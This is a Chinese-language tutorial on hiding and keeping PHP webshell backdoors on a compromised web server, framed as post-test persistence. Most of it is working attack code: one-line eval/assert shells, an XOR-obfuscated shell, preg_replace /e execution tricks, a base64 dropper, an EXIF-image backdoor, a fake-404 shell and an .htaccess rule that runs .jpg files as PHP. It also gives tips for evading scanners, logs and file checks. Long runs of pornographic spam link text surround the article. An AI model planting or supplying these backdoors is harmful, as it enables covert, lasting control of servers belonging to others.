精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

PHP后門隱藏與維持技巧

安全 黑客攻防
在一個成功的測試后,通常會想讓特權保持的更久些.留后門的工作就顯得至關重要,通常布設的后門包括但不限于數據庫權限,WEB權限,系統用戶權限等等.此文則對大眾后門隱藏的一些思路做科普。

0×00前言

在一個成功的測試后,通常會想讓特權保持的更久些.留后門的工作就顯得至關重要,通常布設的后門包括但不限于數據庫權限,WEB權限,系統用戶權限等等.此文則對大眾后門隱藏的一些思路做科普.

[[113256]]

以PHP-WEBBACKDOOR為例,拋磚引玉

一個最常見的一句話后門可能寫作這樣

  1. <?php @eval($_POST['cmd']);?> 

或這樣

  1. <?php @assert($_POST['cmd']);?> 

當然,這僅是調用的函數不同,關于PHP禁用的函數請在php.ini: disable_functions 中尋找.

但是運維直觀尋找我們shell的方式也有很多,如

◆通過文件名/修改時間/大小,文件備份比對發現異常

◆通過WEBSHELL后門掃描腳本發現,如Scanbackdoor.php/Pecker/shelldetect.php以及各種掃描器等等

◆通過Access.log訪問日志發現后門所在

◆又或者,我們的測試一句話還要被WAF攔一下,再來個警告日志,等等

針對常見的檢測方式,總結以下七常用手法對shell進行隱藏

0×01規避

看看各種掃描后門的代碼就知道,留一個眾人皆知,人人喊打的關鍵詞在shell中是萬萬不能的

PHP后門隱藏與維持技巧

 

常見的關鍵詞如:

◆系統命令執行: system, passthru, shell_exec, exec, popen, proc_open

◆代碼執行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

◆文件包含: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

過去有朋友機智的使用$_POST[0]($_POST[1])來執行命令,可惜現在也難逃掃描器法眼,但萬象變化,構造方法是無窮的

tudouya 同學在FREEBUF上給出[一種構造技巧](http://www.freebuf.com/articles/web/33824.html)利用

  1. <?php  
  2. @$_++; // $_ = 1  
  3. $__=("#"^"|"); // $__ = _  
  4. $__.=("."^"~"); // _P  
  5. $__.=("/"^"`"); // _PO  
  6. $__.=("|"^"/"); // _POS  
  7. $__.=("{"^"/"); // _POST  
  8. ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);  
  9. ?> 

構造生成,當然,嫌太直觀可以寫作這樣

  1. <?php @$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);?> 

然后再填充些普通代碼進行偽裝,一個簡單的”免殺”shell樣本就出現了

PHP后門隱藏與維持技巧

 

執行無誤,且繞過普通掃描器,也可依賴之寫新的臨時shell

PHP后門隱藏與維持技巧 

#p#

0×02特性

借助語法特性執行命令亦不失為有趣的手法.借用php在處理變量時的語法特性,會分析雙引號中的數據是否含有變量(并解析其值)

eg.:

  1. ${@eval(phpinfo())} 

{}可解析雙引號內的變量內容,@保持出錯后繼續執行

然后就可以大搖大擺的開始構造隱藏后門了,但此處構造欲再借力于函數引起的命令執行,沒錯,就是preg_replace

  1. <?php @preg_replace("//e",$_POST['cmd'],"");?> 

這玩法顯然已經進了掃描器黑名單,簡單修改下

  1. <?php  
  2. function funfunc($str){}  
  3. echo preg_replace("/<title>(.+?)<\/title>/ies"'funfunc("\1")'$_POST["cmd"]);  
  4. ?> 

執行了,沒有被發現

PHP后門隱藏與維持技巧

執行的方式顯而易見,正則匹配后的{${phpinfo()}}傳入funfunc時引起了代碼執行

  1. funfunc("{${phpinfo()}}"

另一種方法

  1. <?php @assert("\$arr=\"".$_GET['cmd']."\";");?> 

PHP后門隱藏與維持技巧

0×03包含

文件包含是眾人都玩過的方法,只是包含也有技巧

普通文件包含可能僅僅是一個include包含某個txt或jpg,甚至直接留一個包含漏洞,但掃描器也容易發現,多出的包含文件也易被發現

看此腳本

  1. <?php  
  2.     if(@isset($_GET[content]))  
  3.     {  
  4.     $fp=fopen('README','w');  
  5.     file_put_contents('README',"<?php\r\n");  
  6.     @file_put_contents('README',$_GET[content],FILE_APPEND);  
  7.     fclose($fp);  
  8.     require 'README';}  
  9. ?> 

算是解決了一點問題,需求的shell可隨用隨生成,進而包含之

PHP后門隱藏與維持技巧

可惜由于file_put_contents等函數過于敏感,也是很容易被掃描發現

編碼生成的方式創建shell,隨訪問而生成.

  1. <?php @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),w),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));  
  2. ?> 

可以逃避一些掃描器,但這個模式也比較引人注目,生成的新文件也要做簡單的隱藏以躲過查殺.

當然對于啟發式之類的新概念就不考慮了

在這種方式也滿足不了需求的情況下,機智的攻擊者又重拾圖片

  1. <?php $exif=exif_read_data('./lol.jpg');preg_replace($exif['Make'],$exif['Model'],'');?> 

參考:一種隱藏在JPG圖片EXIF中的后門

這次不必再簡單的copy /b生成圖片馬了,借用preg_replace執行文件的特定標志一樣可行

PHP后門隱藏與維持技巧

此處可能會提示 Call to undefined function exif_read_data()

需要修改php.ini, extension=php_exif.dll

將其加載順序改為extension=php_mbstring.dll的后面

PHP后門隱藏與維持技巧

可以看出,此圖片后門借助了preg_replace \e參數,依賴了php的變量解析執行,又使用了base64編碼,最后依賴文件標識將一個完整的shell拼合,算是給初涉后門隱藏的童鞋一個小提醒

當然,只要有包含點,包含文件的形式是多樣的,甚至于包含error_log(雖然可能要考慮閉合),只有想不到…#p#

0×04隱匿

為了不讓訪問者發現后門的存在,機智的安全研究員也會混淆視聽故弄玄虛

  1. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">  
  2.     <html><head>  
  3.     <title>404 Not Found</title>  
  4.     </head>  
  5.     <body>  
  6.     <h1>Not Found</h1>  
  7.     <p>The requested URL was not found on this server.</p>  
  8.     </body>  
  9.     </html>  
  10. <?php  
  11.     @preg_replace("/[checksql]/e",$_POST['cmd'],"saft");  
  12. ?> 

借助上面的html渲染后,瀏覽頁面已經開始偽裝404以迷惑視聽了

但躲得過訪問者也躲不過日志分析,為更好的隱藏在大量日志中,構造如下腳本

  1. <?php  
  2.     header('HTTP/1.1 404');  
  3.     ob_start();  
  4.     @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),w),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));  
  5.     ob_end_clean();  
  6. ?>  

訪問之,是真正的404,沒錯,日志中也是這樣

PHP后門隱藏與維持技巧

但此刻當前目錄已生成我們要連接的腳本

0×05混淆

用過weevely工具的童鞋應該知道,其生成的免殺shell像這樣

  1. <?php  
  2.     $penh="sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30=";  
  3.     $kthe="JGEpPjgiMpeyRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn";  
  4.     $ftdf = str_replace("w","","stwrw_wrwepwlwawcwe");  
  5.     $wmmi="X3JlcgiGxhY2UgioYXgiJyYXkoJy9bXlx3PVgixzXS8nLCgicvXHMvJyksIGFycmF5KCcnLCcrgiJyk";  
  6.     $zrmt="JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo";  
  7.     $smgv = $ftdf("f""""bfafsfef6f4_fdfefcodfe");  
  8.     $jgfi = $ftdf("l","","lclrlelaltel_functlilon");  
  9.     $rdwm = $jgfi(''$smgv($ftdf("gi"""$zrmt.$kthe.$wmmi.$penh))); $rdwm();  
  10. ?> 

終端下連接后像這樣

PHP后門隱藏與維持技巧

Ps:截圖忘記修改終端編碼了:(

其免殺方式在于,在固定區域生成隨機名稱變量,后借助str_replace拼合base64_decode,執行命令的過程

當然,這是在代碼層面混淆視聽以躲過掃描器

更常用的混淆視聽的方法:

◆修改文件時間

◆改名融入上傳后所在文件夾,讓人無法直觀看出文件異常

◆文件大小的偽裝處理(至少看起大小像個正常腳本)

◆選好藏身路徑并盡量少的訪問

◆畸形目錄%20

關于空格目錄,還是相對容易被發現的

PHP后門隱藏與維持技巧

0×06解析

利用.htaccess,添加解析后門

PHP后門隱藏與維持技巧

如:

  1. AddType   application/x-httpd-php     .jpg 

PHP后門隱藏與維持技巧

以上以weeverly為例

0×07雜糅

總結以上方法,大部分無非是一個構造漏洞的過程,漏洞構造的代碼能有多奇葩,后門就可以多奇葩.可以寫纖細婉約的,也可以搞簡單粗暴的,只是適用場合不同而已.如能很好的融合思路,構造自己的隱藏shell想來亦非難事.以上僅為總結經驗之談,各位有有趣的想法還望不吝賜教.

責任編輯:藍雨淚 來源: 網絡安全攻防實驗室
相關推薦

2020-11-06 00:00:00

PHP技巧后門

2018-07-18 11:18:13

2013-08-20 16:16:19

2011-03-30 10:53:45

2009-03-09 11:07:24

木馬病毒查殺

2013-07-09 16:12:47

2010-09-13 14:34:55

2024-05-31 13:18:44

2013-07-29 10:02:42

2014-03-06 17:52:25

2015-01-22 13:43:09

IT運維東華網智

2013-06-19 10:03:42

2010-09-13 14:47:58

2010-09-13 15:06:36

2009-12-11 16:44:33

PHP冒泡排序

2014-10-08 09:33:09

2009-12-11 17:57:13

PHP應用JSON

2009-12-09 17:33:22

PHP性能優化

2013-05-10 10:56:09

2021-03-30 10:57:46

源碼惡意軟件攻擊
點贊
收藏

51CTO技術棧公眾號

啪啪亚洲精品| 新版的欧美在线视频| 狠狠v欧美v日韩v亚洲ⅴ| 欧美精品一区二区免费| 男女性杂交内射妇女bbwxz| 精品极品在线| 国产精品人人做人人爽人人添| 国产精品自拍小视频| 国产成人无码aa精品一区| 九九热hot精品视频在线播放| 欧美视频在线看| 在线精品亚洲一区二区| 免费观看毛片网站| 美女爽到高潮91| 91精品国产电影| 91动漫免费网站| 国产劲爆久久| 欧美高清视频不卡网| 成人一区二区av| 国产网站在线播放| 成人午夜视频在线观看| 国产精品露脸av在线| 久久精品视频久久| 日韩免费看片| 亚洲美女视频网站| 曰本三级日本三级日本三级| 色8久久影院午夜场| 亚洲影视在线观看| 亚洲日本无吗高清不卡| 日本免费一区视频| 狠狠色狠狠色合久久伊人| 97在线视频免费看| 青青草手机视频在线观看| 国产精品免费不| 亚洲第一网站男人都懂| 国产精品久久久久久9999| 全亚洲第一av番号网站| 亚洲mv在线观看| 久久久无码中文字幕久...| 国产一区精品| 26uuu国产电影一区二区| 国产精品国产三级国产专区53| 91无套直看片红桃| 日韩制服丝袜先锋影音| 欧美亚洲国产精品| 久久久久无码国产精品| 久久精品亚洲人成影院| 色爱av美腿丝袜综合粉嫩av| 熟女少妇一区二区三区| 精品少妇3p| 欧美v日韩v国产v| 四虎1515hh.com| 亚洲欧美在线综合| 91精品久久久久久久久99蜜臂| www.色就是色| 免费高清视频在线一区| 在线精品视频一区二区| 99视频精品免费| 日韩毛片免费观看| 色噜噜久久综合| 黄色高清无遮挡| 制服诱惑亚洲| 欧美主播一区二区三区| 亚洲福利精品视频| 欧美视频免费看| 欧美人狂配大交3d怪物一区| 中文字幕第17页| 一区二区三区日本视频| 欧美精品视频www在线观看| 91女神在线观看| 国精品产品一区| 3atv在线一区二区三区| 99视频在线观看视频| 欧美精品三级在线| 欧美videos中文字幕| 亚洲av成人片色在线观看高潮| 国产精品自在| 亚洲美女免费精品视频在线观看| 精品无码在线观看| 久久国产精品亚洲人一区二区三区 | 日韩免费视频一区| 国产精品99精品无码视亚| 久久大胆人体视频| 亚洲图片在线综合| 潘金莲一级黄色片| 欧美日韩免费| 91精品国产九九九久久久亚洲| 伊人中文字幕在线观看| 毛片一区二区三区| 99九九电视剧免费观看| 无套内谢的新婚少妇国语播放| 久久综合九色综合97_久久久| 视频在线精品一区| 怡红院在线播放| 婷婷综合五月天| 午夜免费看视频| 9999久久久久| 亚洲区在线播放| 中文字幕亚洲欧美日韩| 亚洲毛片在线| 国产一区二区视频在线观看| 国产自产一区二区| 国产日韩一级二级三级| 日本一区二区三区四区五区六区| 超碰91在线观看| 欧美色涩在线第一页| 日韩大尺度视频| 欧美理论电影大全| 久久久欧美精品| 中文字幕福利视频| 99视频在线观看一区三区| 亚洲精品国产精品国自产观看| 欧美一卡二卡| 欧美日韩国产高清一区二区三区| 性欧美18—19sex性高清| 成人羞羞视频播放网站| 性色av香蕉一区二区| 一级黄色大片网站| 91在线精品秘密一区二区| 日本丰满大乳奶| av久久网站| 亚洲欧美国产一本综合首页| 久久久久久久久97| 久久99精品久久久久久国产越南 | 国际精品欧美精品| 欧美丰满老妇厨房牲生活| 成人一级免费视频| 99精品桃花视频在线观看| 日韩人妻精品一区二区三区| 成人黄色免费短视频| 亚洲第一色在线| 青青草原在线免费观看| 精品在线你懂的| 日韩精品欧美在线| 69久成人做爰电影| 亚洲精品99久久久久| 精品欧美一区二区久久久久 | 一区二区在线看| 日本人视频jizz页码69| 九九热精品视频在线观看| 91国产美女视频| 亚洲精品.www| 一区二区三区免费网站| 久久久久久久久久毛片| 四虎成人精品永久免费av九九| 日韩av123| 欧美男男同志| 日韩欧美国产骚| 人妻无码一区二区三区| 影音先锋中文字幕一区| 99久久99| 日本小视频在线免费观看| 91精品国产高清一区二区三区 | 一区二区三区四区乱视频| 拔插拔插华人永久免费| 成人羞羞动漫| 成人免费高清完整版在线观看| 午夜激情视频在线观看| 这里是久久伊人| 久久久久亚洲av无码专区体验| 国产一区二区三区四区五区美女| 黄色网址在线免费看| 国产一区二区三区黄网站| 久久成人精品视频| 精品人妻一区二区三区蜜桃| 亚洲一区二区综合| 亚洲视频在线播放免费| 国产精品夜夜夜| 区一区二区三区中文字幕| 成人自拍视频网| www亚洲欧美| 精品国产一级片| 亚洲图片欧美色图| 大黑人交xxx极品hd| 日韩不卡一区二区三区| 国产精品亚洲天堂| 99re8这里有精品热视频8在线| 91av视频在线播放| 大胆av不用播放器在线播放| 91麻豆精品国产91久久久资源速度| 在线免费观看亚洲视频| www.亚洲色图| 浓精h攵女乱爱av| 欧美福利影院| 免费成人看片网址| 国产香蕉久久| 久久久久久久久久av| 理论在线观看| 欧美一区二区三区不卡| 日本一区二区欧美| 欧美国产精品一区| 性折磨bdsm欧美激情另类| 亚洲欧美日韩精品一区二区| 在线视频不卡一区二区| 粉嫩的18在线观看极品精品| 国产91九色视频| 超碰在线无需免费| 亚洲日韩第一页| 国产高潮在线观看| 色素色在线综合| 欧美三级小视频| 国产亚洲欧美在线| 国产精品日日摸夜夜爽| 日韩va欧美va亚洲va久久| 国产一级大片免费看| 欧美人与牛zoz0性行为| 91在线播放视频| 成人av色网站| 97成人精品区在线播放| 国产乱色在线观看| 亚洲欧美日韩天堂一区二区| www.中文字幕| 欧美色图一区二区三区| 在线观看免费av片| 一个色在线综合| 91导航在线观看| 99re热视频精品| 91小视频在线播放| 久久综合亚州| 国产伦精品一区二区三区四区视频_| 日本大胆欧美| 欧美日韩一区在线视频| 97se亚洲| 91在线|亚洲| 青青在线精品| 国产精品国产三级国产aⅴ9色| 高清在线视频不卡| 欧美精品一二区| 欧美三级黄网| 中文字幕亚洲一区二区三区五十路 | 在线综合+亚洲+欧美中文字幕| 天干夜夜爽爽日日日日| 午夜精品久久久久久久99水蜜桃| 国产女片a归国片aa| 中文字幕日韩精品一区| 大吊一区二区三区| 国产欧美久久久精品影院 | 国产精品另类一区| 性欧美13一14内谢| 久久夜色精品国产噜噜av| 久久精品女同亚洲女同13| 丰满白嫩尤物一区二区| 欧美一级大片免费看| 国产麻豆91精品| 青青草精品在线| 国产一区二区h| 欧美性猛交xx| 国产成人自拍网| 国内av免费观看| 国产一区二区三区av电影 | 99综合电影在线视频| 无码人妻久久一区二区三区蜜桃| 国产一区二区剧情av在线| 亚洲黄色av片| 国产精品69久久久久水密桃| 青青草精品在线| 丁香五精品蜜臀久久久久99网站| 国产成人av片| 成人激情av网| 久久精品老司机| 国产亚洲欧美日韩俺去了| 一级在线观看视频| 国产精品久久久99| 婷婷久久综合网| 亚洲午夜电影在线观看| 天天操中文字幕| 欧美私人免费视频| 国产毛片毛片毛片毛片| 日韩欧美在线1卡| 日本黄色一区二区三区| 日韩精品在线私人| 97最新国自产拍视频在线完整在线看| 日韩中文字幕欧美| 在线中文字幕视频观看| 97在线视频观看| 精品123区| 91香蕉亚洲精品| 免费福利视频一区| 日韩一本精品| 欧美日韩一区二区三区四区在线观看| 日本手机在线视频| 日韩极品在线观看| 丰满少妇一区二区三区专区| k8久久久一区二区三区| 亚洲高潮女人毛茸茸| 亚洲精品中文在线| 青青视频在线免费观看| 9191久久久久久久久久久| 人妻无码一区二区三区久久99| 亚洲天堂一区二区三区| 在线观看电影av| 日本aⅴ大伊香蕉精品视频| 91精品国产色综合久久不卡粉嫩| 国产视频不卡| 91视频综合| 欧美日韩在线一| 紧缚奴在线一区二区三区| 北京富婆泄欲对白| 中国av一区二区三区| 日韩av男人天堂| 欧美日韩精品一区视频| 日韩一级片免费在线观看| 最近更新的2019中文字幕| √最新版天堂资源网在线| 成人在线免费观看视视频| 日韩在线你懂的| 最近免费观看高清韩国日本大全| 久久一区视频| 亚洲熟女一区二区| 亚洲天堂免费看| 波多野结衣电车| 亚洲高清久久网| 超碰在线最新| 国产精品一区二区在线| 天堂av一区二区三区在线播放| 国产高清精品软男同| 日本欧美一区二区三区| 精品人妻一区二区三区日产| 亚洲欧美偷拍另类a∨色屁股| 免费看日批视频| 精品国产乱码久久久久久免费| 在线播放日本| 国产精品91久久久久久| 另类春色校园亚洲| 男人草女人视频| 久久99国产精品久久99| 亚洲区自拍偷拍| 亚洲va欧美va人人爽午夜 | 亚洲人成在线播放| 91超碰在线播放| 亚洲一区制服诱惑| 91一区在线| 欧美女同在线观看| 国产精品素人视频| 成年人视频免费| 亚洲欧美日韩另类| 97成人资源| 久久人人爽爽人人爽人人片av| 亚洲国产国产亚洲一二三| 波多野结衣在线免费观看| √…a在线天堂一区| 中日韩av在线| 自拍亚洲一区欧美另类| 三级成人在线| 日韩在线三级| 日本麻豆一区二区三区视频| 欧美偷拍一区二区三区| 日本韩国欧美在线| 国产福利在线视频| 国产精品福利观看| 日韩欧美网址| 天天做天天干天天操| 亚洲色图一区二区三区| 99精品在线视频观看| 欧美激情精品久久久| 亚洲欧美日本国产| 国产精彩视频一区二区| aaa欧美色吧激情视频| 中文字幕精品无码一区二区| 亚洲人成人99网站| 中文字幕日本一区二区| 亚洲一区二区在线免费观看| 黄页网站大全一区二区| 久草资源在线视频| 日韩电影在线观看中文字幕| 一区二区三区四区日本视频| 日韩中文字幕一区| 久久99热狠狠色一区二区| 1024手机在线视频| 亚洲成人免费在线视频| 自拍偷拍亚洲视频| 亚洲v欧美v另类v综合v日韩v| 精品亚洲成a人在线观看| 久草视频手机在线观看| 日韩精品中文字幕在线播放| 偷拍精品精品一区二区三区| 亚洲在线不卡| 国产91精品在线观看| 亚洲第一精品在线观看| 影音先锋日韩有码| 久久69av| 国产精品秘入口18禁麻豆免会员| 国产清纯在线一区二区www| 一本色道久久综合亚洲| 欧美激情中文网| 国产一区二区三区四区五区| 亚洲综合伊人久久| 亚洲成av人影院在线观看网| 国产一二三区在线| 99国精产品一二二线| 日韩成人午夜精品| 免费麻豆国产一区二区三区四区| 亚洲欧美日韩精品久久| 视频在线观看免费影院欧美meiju| 欧美黄色免费影院| 亚洲男帅同性gay1069| 青青草在线免费观看| 91视频8mav| 久久精品二区三区| 久久99久久久|